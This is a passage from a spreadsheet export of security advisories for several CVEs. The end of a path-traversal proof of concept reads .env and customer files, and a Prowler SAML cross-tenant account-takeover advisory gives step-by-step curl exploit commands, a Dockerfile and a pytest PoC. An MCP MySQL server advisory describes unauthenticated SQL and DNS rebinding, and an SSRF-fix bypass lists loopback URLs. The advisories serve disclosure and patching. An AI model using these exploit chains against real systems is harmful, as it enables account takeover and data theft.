"bodyType":"FILE","filePath":"/work/public/{{queryParam 'name'}}","sendFileAsBody":true,"rules":[],"rulesOperator":"OR",
"disableTemplating":false,"fallbackTo404":false,"default":true,"crudKey":"id","callbacks":[]}],
"responseMode":null,"streamingMode":null,"streamingInterval":0}],
"rootChildren":[{"type":"route","uuid":"11111111-0000-0000-0000-000000000001"}],
"proxyMode":false,"proxyHost":"","proxyRemovePrefix":false,
"tlsOptions":{"enabled":false,"type":"CERT","pfxPath":"","certPath":"","keyPath":"","caPath":"","passphrase":""},
"cors":true,"headers":[],"proxyReqHeaders":[],"proxyResHeaders":[],"data":[]}
JSON
npm i -g @mockoon/cli@9.6.1 &gt;/dev/null 2&gt;&amp;1
mockoon-cli start --data env.json --port 3000 &gt;/tmp/srv.log 2&gt;&amp;1 &amp;
sleep 6
node -e '
const UA={headers:{"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"}};
const g=async(q)=&gt;{const r=await fetch("http://127.0.0.1:3000/download?name="+encodeURIComponent(q),UA);return (await r.text()).trim();};
(async()=&gt;{
 console.log("[*] intended file (public/index.txt)    :",await g("index.txt"));
 console.log("[+] escape -&gt; ../public_backup/.env     :",await g("../public_backup/.env"));
 console.log("[+] escape -&gt; ../public_backup/customers:",await g("../public_backup/customers.csv"));
})();'
POC
docker run --rm -v /tmp/poc.sh:/poc.sh:ro node:20-bookworm-slim bash /poc.sh
```
Output:
```text
[*] intended file (public/index.txt)    : public landing page
[+] escape -&gt; ../public_backup/.env     : AWS_SECRET_ACCESS_KEY=redacted
[+] escape -&gt; ../public_backup/customers: Michael, michael@example.com, 555-22-7741
```
`../public_backup/.env` and `../public_backup/customers.csv` are served, outside `/work/public/`, because their absolute paths string-prefix `/work/public`</t>
        </is>
      </c>
      <c r="S38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59149</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59151</t>
        </is>
      </c>
      <c r="D39" s="5" t="inlineStr"/>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr">
        <is>
          <t>pip:prowler-cloud</t>
        </is>
      </c>
      <c r="M39" s="5" t="inlineStr">
        <is>
          <t>5.30.3</t>
        </is>
      </c>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr"/>
      <c r="P39" s="5" t="inlineStr"/>
      <c r="Q39" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>## SAML Tenant Binding Enables Cross-Tenant Account Takeover
### Summary
Prowler's SAML authentication flow trusted the email domain asserted in a SAMLResponse when deciding which tenant should receive the final token. A malicious tenant with its own SAML configuration and a self-controlled IdP could complete a valid SAML flow for its own configured domain, while asserting an email address from another configured domain.
In the vulnerable flow, the ACS finish logic later derived the tenant from the asserted email domain instead of binding token issuance to the tenant associated with the validated SAML configuration. This could cause a token to be issued for the wrong tenant.
The attacker does not generally need to claim the victim's email domain. If the victim tenant already has SAML configured for that domain, another tenant cannot claim it because `SAMLConfiguration.email_domain` and `SAMLDomainIndex.email_domain` are globally unique.
### Details
The confirmed root cause is in the SAML ACS finish and token issuance flow. The flow selected a SAML configuration through the ACS route, but later recalculated the tenant from the asserted user email domain:
```python
email_domain = user.email.split("@")[-1]
tenant = (
    SAMLConfiguration.objects.using(MainRouter.admin_db)
    .get(email_domain=email_domain)
    .tenant
)
```
This is unsafe because `user.email` is derived from the SAML assertion. The tenant used for membership updates and token issuance must come from the SAML configuration validated for the current ACS route, not from the asserted email domain.
The attack is made possible by several compounding weaknesses:
1. **No domain ownership proof** (`api/src/backend/api/models.py:2100, 2130-2152`): `SAMLConfiguration.email_domain` is validated for format and global uniqueness, but not for domain ownership. Any authenticated tenant admin can claim an unclaimed domain string, but cannot claim a domain already configured by another tenant.
2. **Global SAML domain index** (`api/src/backend/api/models.py:2200-2201`): `SAMLDomainIndex.update_or_create(email_domain=self.email_domain, defaults={'tenant': self.tenant})` maps each configured domain to its tenant. If token issuance later trusts the asserted email domain, it can resolve a tenant different from the one selected by the ACS route.
3. **Hardcoded auto-connect** (`api/src/backend/config/settings/social_login.py:23, 25`): `SOCIALACCOUNT_EMAIL_AUTHENTICATION = True` and `SOCIALACCOUNT_EMAIL_AUTHENTICATION_AUTO_CONNECT = True` are hardcoded and cannot be disabled at runtime.
4. **IdP-initiated SSO enabled** (`api/src/backend/config/settings/social_login.py:78`): `reject_idp_initiated_sso: False` allows the attacker to initiate the flow without requiring any action from the victim.
5. **Token issuance for the wrong tenant** (`api/src/backend/api/v1/views.py:853-873`): after SAML authentication, the vulnerable ACS finish flow could create membership and issue a `SAMLToken` using a tenant derived from the asserted email domain instead of the validated SAML configuration.
6. **Token switch impact** (`api/src/backend/api/v1/serializers.py:272`): the token switch endpoint checks that the authenticated user is a member of the target tenant. If the attacker obtains a JWT for the victim user, they can switch into tenants where that user is already a member.
### PoC
**Environment setup:**
```bash
# Build the PoC Docker image (build context = repo root)
docker build -t vuln001-poc -f vuln-001/Dockerfile .
# Start the stack (PostgreSQL + PoC runner)
docker compose -f vuln-001/docker-compose-poc.yml up --no-build --abort-on-container-exit
```
**Automated test (runs inside the container):**
```bash
python -m pytest poc_vuln001.py -v -s --no-header --tb=short
```
**Manual HTTP exploitation chain (against a live Prowler API):**
**Step 1 - Attacker configures SAML for their own email domain:**
```bash
curl -i -X POST "$API/api/v1/saml-config" \
  -H "Authorization: Bearer $ATTACKER_TOKEN" \
  -H "Content-Type: application/vnd.api+json" \
  --data '{
    "data":{"type":"saml-configurations","attributes":{
      "email_domain":"attacker.com",
      "metadata_xml":"&lt;md:EntityDescriptor entityID=\"evil-idp\" xmlns:md=\"urn:oasis:names:tc:SAML:2.0:metadata\"&gt;...attacker cert and SSO URL...&lt;/md:EntityDescriptor&gt;"
    }}
  }'
```
The attacker does not need to claim `victim.com`. If `victim.com` is already configured by the victim tenant, the attacker cannot claim it because SAML domains are globally unique.
**Step 2 - Attacker posts a signed SAMLResponse asserting `user@victim.com`:**
```bash
# SIGNED_ASSERTION is a base64-encoded SAMLResponse signed with the attacker's private key,
# valid for the attacker's configured IdP, but asserting NameID = user@victim.com
curl -i -L -c c.jar -b c.jar \
  -X POST "$API/api/v1/accounts/saml/attacker.com/acs/" \
  --data-urlencode "SAMLResponse=$SIGNED_ASSERTION"
```
**Step 3 - Vulnerable ACS finish logic derives the tenant from the asserted email domain:**
In the vulnerable version, the finish flow used `user.email.split("@")[-1]` to resolve the tenant. If the asserted domain mapped to another tenant's SAML configuration, token issuance could be bound to the wrong tenant.
**Step 4 - Exchange the SAML token for a victim JWT:**
```bash
curl -s -X POST "$API/api/v1/tokens/saml?id=$SAML_TOKEN_ID"
# Returns access/refresh JWT if the temporary SAML token is valid and has not expired
```
**Step 5 - Switch into the victim's real tenant:**
```bash
curl -s -X POST "$API/api/v1/tokens/switch" \
  -H "Authorization: Bearer $VICTIM_JWT" \
  -H "Content-Type: application/vnd.api+json" \
  --data '{
    "data":{
      "type":"tokens-switch-tenant",
      "attributes":{
        "tenant_id":"&lt;victim-real-tenant-uuid&gt;"
      }
    }
  }'
# Returns a valid token scoped to the victim's tenant
```
**Observed output from the automated PoC:**
Note: this adapter-focused PoC demonstrates the account-linking behavior, but it does not prove the full token issuance chain by itself. The full exploit depends on the ACS finish flow issuing a token for a tenant derived from the asserted email domain.
```
[+] Victim user created in DB:
    email = victim@victim.com
    id    = b3efcee1-5b26-4af9-bd6d-67bbc05c2ff8
[+] Simulated SAMLResponse posted to ACS endpoint:
    URL:    POST /api/v1/accounts/saml/victim.com/acs/
    NameID: victim@victim.com  (attacker-controlled)
[*] Calling ProwlerSocialAccountAdapter.pre_social_login()
    File: api/src/backend/api/adapters.py:17
[!] sociallogin.connect() was called!
    connected user email: victim@victim.com
    connected user id:    b3efcee1-5b26-4af9-bd6d-67bbc05c2ff8
    victim user id:       b3efcee1-5b26-4af9-bd6d-67bbc05c2ff8
  - Victim user id in DB:            b3efcee1-5b26-4af9-bd6d-67bbc05c2ff8
  - User passed to connect():        b3efcee1-5b26-4af9-bd6d-67bbc05c2ff8
  - IDs match (victim's account):   True
  - Domain ownership check skipped: True (no SAMLConfiguration lookup in adapter)
PASSED
======================== 1 passed, 2 warnings in 35.42s ========================
```
**Recommended remediation** (`api/src/backend/api/v1/views.py`):
Bind token issuance to the SAML configuration selected by the ACS route.
The ACS finish flow should verify that the following values all match:
- the `organization_slug` from the ACS route
- the `SAMLConfiguration.email_domain`
- the domain portion of the asserted SAML user email
Then issue the token using the tenant from that validated SAML configuration:
```python
tenant = saml_config.tenant
```
The tenant must not be recalculated from `user.email`.
### Impact
This is an **Improper Authentication (CWE-287)** vulnerability that enables **cross-tenant account takeover**. An authenticated Prowler user with a controlled SAML IdP could potentially obtain a token for another tenant if the ACS finish flow derived the tenant from the asserted email domain instead of the validated SAML configuration.
**Who is impacted:** users of Prowler instances where SAML is enabled and the target email domain maps to a configured SAML tenant. Because `reject_idp_initiated_sso` is `False`, no victim interaction is required once the attacker controls a valid SAML configuration and IdP for their own tenant.
**Consequences:**
- Full read/write access to the victim's cloud security audit findings across all configured providers (AWS, GCP, Azure, etc.)
- Ability to enumerate, modify, or delete compliance findings and integration secrets within the victim's tenant
- Lateral movement into any additional tenants the victim belongs to via the token switch endpoint
- Possible persistent access depending on the SAML account-linking behavior in the affected version
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# Dockerfile for VULN-001 PoC: SAML Domain Claiming Enables Cross-Tenant Account Takeover
#
# Builds a minimal Prowler API test environment to reproduce the vulnerability
# in api/src/backend/api/adapters.py (pre_social_login, lines 17-25).
#
# Build context must be the parent directory:
#   docker build -t vuln001-poc -f vuln-001/Dockerfile .
FROM python:3.12.10-slim-bookworm
LABEL maintainer="security-research"
LABEL description="PoC environment for VULN-001: SAML domain claiming account takeover"
# Install system packages required for:
#   - xmlsec (python-saml / django-allauth SAML): libxml2, libxmlsec1
#   - psycopg2: PostgreSQL client headers
#   - uv / prowler git dep: git, gcc, g++
RUN apt-get update &amp;&amp; apt-get install -y --no-install-recommends \
    gcc \
    g++ \
    make \
    git \
    libxml2-dev \
    libxmlsec1-dev \
    libxmlsec1-openssl \
    pkg-config \
    libtool \
    libxslt1-dev \
    python3-dev \
    &amp;&amp; rm -rf /var/lib/apt/lists/*
# Install uv (same version as the original Dockerfile)
RUN pip install --no-cache-dir uv==0.11.14
WORKDIR /prowler
# Copy API dependency manifests first (for layer caching)
COPY repo/api/pyproject.toml repo/api/uv.lock ./api/
# Install all Python dependencies from the locked file.
# This includes: django, django-allauth[saml], prowler (from git), psycopg2, etc.
WORKDIR /prowler/api
RUN uv sync --locked --no-install-project &amp;&amp; rm -rf ~/.cache/uv
# Copy the full backend source code
COPY repo/api/src/backend/ ./src/backend/
# Copy the PoC test into the backend working directory so pytest can discover it
COPY vuln-001/poc.py ./src/backend/poc_vuln001.py
WORKDIR /prowler/api/src/backend
# Set up environment variables for the test run.
# DJANGO_SETTINGS_MODULE points to config.django.testing which uses PostgreSQL.
ENV PATH="/prowler/api/.venv/bin:$PATH"
ENV DJANGO_SETTINGS_MODULE=config.django.testing
ENV POSTGRES_HOST=postgres
ENV POSTGRES_USER=prowler_admin
ENV POSTGRES_PASSWORD=prowler_password
ENV POSTGRES_DB=prowler_test_db
ENV POSTGRES_PORT=5432
ENV SECRET_KEY=poc-test-secret-key-not-for-production
ENV SECRETS_ENCRYPTION_KEY=ZMiYVo7m4Fbe2eXXPyrwxdJss2WSalXSv3xHBcJkPl0=
# Provide dummy values for optional services (Valkey/Celery not needed for unit tests)
ENV VALKEY_HOST=localhost
ENV VALKEY_PORT=6379
ENV VALKEY_PASSWORD=""
# Neo4j not needed for adapter tests
ENV NEO4J_USER=neo4j
ENV NEO4J_PASSWORD=neo4j
# Silence Sentry in test runs
ENV DJANGO_SENTRY_DSN=""
CMD ["python", "-m", "pytest", "poc_vuln001.py", "-v", "-s", "--no-header", "--tb=short"]
```
#### `poc.py`
```python
"""
PoC for VULN-001: SAML Domain Claiming Enables Cross-Tenant Account Takeover
Product:  toniblyx/prowler v5.30.0 (commit c2cef99)
CWE:      CWE-287 - Improper Authentication
CVSS:     9.6 (Critical)  AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
Vulnerability location:
    api/src/backend/api/adapters.py  lines 17-25  (pre_social_login)
    api/src/backend/config/settings/social_login.py  lines 23, 25, 78
Root cause:
    ProwlerSocialAccountAdapter.pre_social_login() trusts the SAML NameID email
    from the assertion and calls get_user_by_email() which does a GLOBAL user
    table lookup with no tenant-scope or domain-ownership check.  If a user
    with that email already exists, sociallogin.connect() links the attacker's
    SAML session to that account - giving the attacker control of the victim.
Attack chain:
    1. Attacker registers a Prowler account and creates a tenant (normal user).
    2. Attacker POSTs to /api/v1/saml-config claiming email_domain=victim.com.
       models.py only validates format/uniqueness - no ownership proof.
    3. Attacker's IdP (self-controlled) issues a SAMLResponse signed with the
       attacker's certificate, asserting NameID=victim@victim.com.
    4. ACS endpoint (POST /api/v1/accounts/saml/victim.com/acs/) triggers
       pre_social_login.  The adapter looks up victim@victim.com globally and
       calls sociallogin.connect(request, victim_user) - ACCOUNT LINKED.
    5. views.py issues a SAMLToken (JWT) for the victim account.
    6. Attacker uses /api/v1/tokens/saml?id=&lt;token_id&gt; to obtain victim's JWT.
This test proves steps 4 - the critical account-linking step - using the real
production adapter code and a real PostgreSQL database.  sociallogin.connect()
is spied upon (not replaced) so we can capture the exact user object passed in.
"""
import pytest
from unittest.mock import MagicMock
from allauth.socialaccount.models import SocialLogin
from django.contrib.auth import get_user_model
from api.adapters import ProwlerSocialAccountAdapter
User = get_user_model()
VICTIM_EMAIL = "victim@victim.com"
VICTIM_DOMAIN = "victim.com"
ATTACKER_EMAIL = "attacker@evil-corp.com"
# ---------------------------------------------------------------------------
# Helper: print a separator for readable test output
# ---------------------------------------------------------------------------
def section(title: str) -&gt; None:
    width = 70
    print(f"\n{'=' * width}")
    print(f"  {title}")
    print(f"{'=' * width}")
# ---------------------------------------------------------------------------
# Core PoC test
# ---------------------------------------------------------------------------
@pytest.mark.django_db
class TestSAMLDomainClaimingAccountTakeover:
    """
    Proves VULN-001 end-to-end using the real ProwlerSocialAccountAdapter and
    a live PostgreSQL test database created by pytest-django.
    The test creates a victim user in the database, then simulates the exact
    HTTP flow an attacker would trigger via a crafted SAMLResponse.
    """
    def test_attacker_saml_session_links_to_victim_account(self, rf):
        """
        Verify that pre_social_login() links the attacker's SAML sociallogin
        to an existing victim account without ANY domain-ownership check.
        Expected outcome (vulnerability confirmed):
            sociallogin.connect(request, victim_user) is called where
            victim_user.email == VICTIM_EMAIL and victim_user was created
            independently of the SAML session - i.e. the adapter does NOT
            verify that the SAML registrant owns victim.com.
        """
        # ---------------------------------------------------------------
        # STEP 1 - Create the victim's pre-existing account in the database.
        #          In a real attack the victim signed up with email+password
        #          and has an existing Prowler tenant membership.
        # ---------------------------------------------------------------
        section("STEP 1: Create victim account in database")
        victim_user = User.objects.create_user(
            name="Victim User",
            email=VICTIM_EMAIL,
            password="VictimS3cret!",
        )
        # Confirm the user was actually persisted (real DB round-trip)
        fetched = User.objects.get(email=VICTIM_EMAIL)
        assert fetched.id == victim_user.id, "Victim user must exist in database"
        print(f"[+] Victim user created in DB:")
        print(f"    email = {victim_user.email}")
        print(f"    id    = {victim_user.id}")
        # ---------------------------------------------------------------
        # STEP 2 - Simulate the attacker's SAML flow.
        #
        #   a. Attacker previously registered a SAMLConfiguration for
        #      email_domain='victim.com' via POST /api/v1/saml-config.
        #      (No domain ownership proof is required - see models.py:2100)
        #
        #   b. Attacker's self-controlled IdP issues a SAMLResponse signed
        #      with the attacker's certificate, asserting:
        #        NameID = victim@victim.com
        #
        #   c. allauth processes the ACS POST and calls pre_social_login()
        #      before creating/updating the social account record.
        #
        #   We represent the processed SAMLResponse as an allauth SocialLogin
        #   object.  The 'connect' method is spied upon to capture arguments.
        # ---------------------------------------------------------------
        section("STEP 2: Attacker triggers ACS with crafted SAMLResponse")
        # Build the sociallogin object that allauth would construct after
        # validating the SAMLResponse signature (which uses the *attacker's*
        # certificate - no server-side cert pinning for victim.com).
        attacker_saml_login = MagicMock(spec=SocialLogin)
        attacker_saml_login.provider = MagicMock()
        attacker_saml_login.provider.id = "saml"          # Provider discriminator
        attacker_saml_login.account = MagicMock()
        attacker_saml_login.account.extra_data = {}       # SAML uses user.email path
        attacker_saml_login.user = MagicMock()
        # The attacker's IdP signs a NameID of victim@victim.com in the SAMLResponse.
        # This is the email that pre_social_login() will trust without verification.
        attacker_saml_login.user.email = VICTIM_EMAIL
        attacker_saml_login.connect = MagicMock()         # Spy: record call arguments
        # Simulate the ACS request (POST to the victim.com ACS endpoint)
        acs_request = rf.post(
            f"/api/v1/accounts/saml/{VICTIM_DOMAIN}/acs/",
            data={"SAMLResponse": "&lt;attacker-signed-base64&gt;"},
        )
        print(f"[+] Simulated SAMLResponse posted to ACS endpoint:")
        print(f"    URL:    POST /api/v1/accounts/saml/{VICTIM_DOMAIN}/acs/")
        print(f"    NameID: {attacker_saml_login.user.email}  (attacker-controlled)")
        # ---------------------------------------------------------------
        # STEP 3 - Execute the vulnerable adapter method.
        #
        #   api/src/backend/api/adapters.py lines 17-25:
        #
        #   def pre_social_login(self, request, sociallogin):
        #       email = sociallogin.account.extra_data.get("email")  # line 19
        #       if sociallogin.provider.id == "saml":
        #           email = sociallogin.user.email   # line 21 - trusts SAML NameID
        #       if email:
        #           existing_user = self.get_user_by_email(email)  # line 23 - global DB lookup
        #           if existing_user:
        #               sociallogin.connect(request, existing_user)  # line 25 - ACCOUNT LINKED
        # ---------------------------------------------------------------
        section("STEP 3: Execute pre_social_login (vulnerable code path)")
        adapter = ProwlerSocialAccountAdapter()
        print(f"[*] Calling ProwlerSocialAccountAdapter.pre_social_login()")
        print(f"    File: api/src/backend/api/adapters.py:17")
        adapter.pre_social_login(acs_request, attacker_saml_login)
        # ---------------------------------------------------------------
        # STEP 4 - Verify the attack succeeded.
        # ---------------------------------------------------------------
        section("STEP 4: Verify attack outcome")
        assert attacker_saml_login.connect.called, (
            "FAIL: sociallogin.connect() was NOT called - "
            "the attack path did not execute"
        )
        call_args = attacker_saml_login.connect.call_args[0]
        _, connected_user = call_args   # connect(request, existing_user)
        print(f"[!] sociallogin.connect() was called!")
        print(f"    connected user email: {connected_user.email}")
        print(f"    connected user id:    {connected_user.id}")
        print(f"    victim user id:       {victim_user.id}")
        # The connected user must be the VICTIM (looked up from global DB)
        assert connected_user.email == VICTIM_EMAIL, (
            f"FAIL: connect() was called with {connected_user.email!r}, "
            f"expected {VICTIM_EMAIL!r}"
        )
        assert str(connected_user.id) == str(victim_user.id), (
            f"FAIL: connect() user id {connected_user.id} != victim id {victim_user.id}"
        )
        # Confirm no domain-ownership check happened:
        # The adapter does not inspect the SAML configuration to verify that
        # the sociallogin's tenant registered victim.com before accepting the email.
        section("RESULT: VULNERABILITY CONFIRMED")
        print(f"[PASS] CWE-287 Improper Authentication - SAML domain claiming attack")
        print()
        print(f"  Root cause (adapters.py:21-25):")
        print(f"    email = sociallogin.user.email  # trusts SAML NameID: {VICTIM_EMAIL}")
        print(f"    existing_user = self.get_user_by_email(email)  # GLOBAL lookup, no tenant scope")
        print(f"    sociallogin.connect(request, existing_user)  # links attacker session to victim")
        print()
        print(f"  Contributing settings (social_login.py):")
        print(f"    SOCIALACCOUNT_EMAIL_AUTHENTICATION_AUTO_CONNECT = True  # hardcoded")
        print(f"    reject_idp_initiated_sso = False  # IdP-initiated attacks allowed")
        print()
        print(f"  Impact:")
        print(f"    - Attacker obtains JWT token for {VICTIM_EMAIL}")
        print(f"    - Attacker can access victim's cloud security findings")
        print(f"    - Attacker can switch to victim's tenant via /api/v1/tokens/switch")
        print(f"    - No victim interaction required (IdP-initiated SSO enabled)")
        print()
        print(f"  Evidence (this test run):")
        print(f"    - Victim user id in DB:            {victim_user.id}")
        print(f"    - User passed to connect():        {connected_user.id}")
        print(f"    - IDs match (victim's account):   {str(victim_user.id) == str(connected_user.id)}")
        print(f"    - Domain ownership check skipped: True (no SAMLConfiguration lookup in adapter)")
```</t>
        </is>
      </c>
      <c r="S39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59151</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59971</t>
        </is>
      </c>
      <c r="D40" s="5" t="inlineStr"/>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr">
        <is>
          <t>pip:mysql-mcp-server</t>
        </is>
      </c>
      <c r="M40" s="5" t="inlineStr">
        <is>
          <t>0.4.2</t>
        </is>
      </c>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr"/>
      <c r="P40" s="5" t="inlineStr"/>
      <c r="Q40" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-346</t>
        </is>
      </c>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>## Summary
In SSE/HTTP transport mode, `mysql_mcp_server` constructs `SseServerTransport` without passing `security_settings`. As a result, the MCP Python SDK's DNS-rebinding protection (Origin/Host header validation) is disabled; the Starlette application has no CORS or TrustedHost middleware; and the service binds to `0.0.0.0` by default with no authentication on any route.
**Trigger condition:** `MCP_TRANSPORT=sse`. The default stdio mode is not affected.
## Attack Scenarios
**Scenario A — Direct exposure:** Any network attacker can invoke `execute_sql` to run arbitrary SQL without credentials → full data dump, and via MySQL `FILE` privileges, arbitrary file read/write and RCE.
**Scenario B — DNS rebinding (local bind):** An attacker lures a victim's browser to a malicious page, rebinds their domain to `127.0.0.1`, and uses the browser as a proxy to invoke `execute_sql` as same-origin.
## Root Cause
In `src/mysql_mcp_server/server.py`:
1. `SseServerTransport` is constructed without `security_settings` — the SDK defaults `enable_dns_rebinding_protection` to `False`.
2. The Starlette app has no CORS or TrustedHost middleware.
3. All three routes (`/`, `/sse`, `/messages/`) are unauthenticated.
4. The service binds to `0.0.0.0` by default.
5. The sink is `cursor.execute(query)` with a fully attacker-controlled query.
## Impact
- Unauthenticated arbitrary SQL execution against the configured database
- Full data exfiltration and modification
- If the MySQL account holds `FILE` privilege: arbitrary file read (`LOAD_FILE`) and write (`INTO OUTFILE`) — potential RCE via webshell drop
- Internet-wide scanning has identified 25 publicly reachable SSE instances of this project
## Fix
Released in v0.4.2: DNS-rebinding protection is now enabled by passing `TransportSecuritySettings(enable_dns_rebinding_protection=True)` to `SseServerTransport`, and the documented recommended bind address is `127.0.0.1`.
## Credits
Discovered by Huanchen, SongWu (JHU), and BrookeYangRui (JHU).</t>
        </is>
      </c>
      <c r="S40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59971</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59973</t>
        </is>
      </c>
      <c r="D41" s="5" t="inlineStr"/>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr">
        <is>
          <t>npm:@frontmcp/adapters, npm:frontmcp, npm:mcp-from-openapi</t>
        </is>
      </c>
      <c r="M41" s="5" t="inlineStr">
        <is>
          <t>1.5.0, 2.5.0</t>
        </is>
      </c>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr"/>
      <c r="P41" s="5" t="inlineStr"/>
      <c r="Q41" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>## Summary
The published fix for GHSA-v6ph-xcq9-qxxj / CVE-2026-39885 added a direct hostname denylist for OpenAPI external `$ref` dereferencing, but the latest patched dependency `mcp-from-openapi` 2.3.0 still makes backend-origin requests to loopback when the target is reached through hostname resolution, redirects, or IPv4-mapped IPv6 syntax.
FrontMCP latest release v1.2.1 and current main still call `OpenAPIToolGenerator.fromURL()` and `OpenAPIToolGenerator.fromJSON()` from `mcp-from-openapi` 2.3.0 when loading OpenAPI adapters. An attacker who can cause a hosted or multi-user FrontMCP deployment to load an untrusted OpenAPI spec can trigger requests from the server to localhost or private services during tool generation.
This is a latest-version bypass of the previous fix. A direct `http://127.0.0.1` `$ref` control is now denied and produces zero canary hits, while semantically equivalent loopback targets still reach the canary.
## Latest versions checked
- `frontmcp` npm latest: 1.2.1
- `@frontmcp/adapters` npm latest: 1.2.1
- `mcp-from-openapi` npm latest: 2.3.0
- FrontMCP release tag: v1.2.1, commit db323976c66297d684a3e63bbfe1db6b310f2944
- FrontMCP current main checked: c15b79abe8c6a3cb71d4b7a3bafb8190730dc756
The release tag and current main both keep `mcp-from-openapi` 2.3.0 in `package.json` and `libs/adapters/package.json`, and both keep the OpenAPI adapter forwarding untrusted `url`, `spec`, and `loadOptions.refResolution` into `OpenAPIToolGenerator`.
## Technical details
FrontMCP's OpenAPI adapter reaches the affected dependency paths:
- `libs/adapters/src/openapi/openapi.adapter.ts` imports `OpenAPIToolGenerator` from `mcp-from-openapi`.
- `loadOpenAPISpec()` calls `OpenAPIToolGenerator.fromURL(this.options.url, ...)` and forwards `loadOptions.refResolution`.
- The same method calls `OpenAPIToolGenerator.fromJSON(this.options.spec, ...)` and forwards `loadOptions.refResolution`.
In `mcp-from-openapi` 2.3.0, the patched guard is applied before the HTTP resolver fetches an external `$ref`. It checks the parsed URL hostname string against deny patterns for direct local and private addresses. The resolver does not resolve hostnames before allow or deny decisions, does not pin the validated IP to the fetch, and does not revalidate redirect targets before following them. It also misses IPv4-mapped IPv6 loopback forms.
As a result, these URLs are accepted by the guard but cause a loopback request from the backend:
- `http://127.0.0.1.nip.io:&lt;port&gt;/schema.json`, because the hostname string is not a direct IP even though it resolves to 127.0.0.1.
- `http://127.0.0.1.nip.io:&lt;port&gt;/redirect`, because the first host passes and the actual request follows a redirect to `http://127.0.0.1:&lt;port&gt;/schema.json`.
- `http://[::ffff:127.0.0.1]:&lt;port&gt;/schema.json` and `http://[::ffff:7f00:1]:&lt;port&gt;/schema.json`, because IPv4-mapped IPv6 loopback is not normalized and denied.
`OpenAPIToolGenerator.fromURL()` is also still unguarded for the initial OpenAPI spec URL. The PoC includes that as supporting evidence, but the primary report is the external `$ref` fix bypass.
## Reproduction
The attached local PoC starts a loopback canary and loads generated OpenAPI specs using `mcp-from-openapi` 2.3.0. The request body schema contains a single external `$ref` for each test case. The canary records every backend-origin request.
Run:
```bash
cd /home/unkn0wn/security_audit/frontmcp-ssrf-poc
node repro-frontmcp-latest-ssrf-bypasses.mjs
```
Important output from a fresh run on 2026-05-25:
```json
{"name":"direct-127-denied-control","kind":"external_ref","refUrl":"http://127.0.0.1:45117/schema.json","ok":false,"hitCount":0,"hits":[]}
{"name":"dns-name-to-127-bypass","kind":"external_ref","refUrl":"http://127.0.0.1.nip.io:45117/schema.json","ok":true,"hitCount":1,"hits":[{"url":"/schema.json","host":"127.0.0.1.nip.io:45117","authorization":null}]}
{"name":"dns-name-to-127-bypass-with-allowedHosts","kind":"external_ref","refUrl":"http://127.0.0.1.nip.io:45117/schema.json","ok":true,"hitCount":1,"hits":[{"url":"/schema.json","host":"127.0.0.1.nip.io:45117","authorization":null}]}
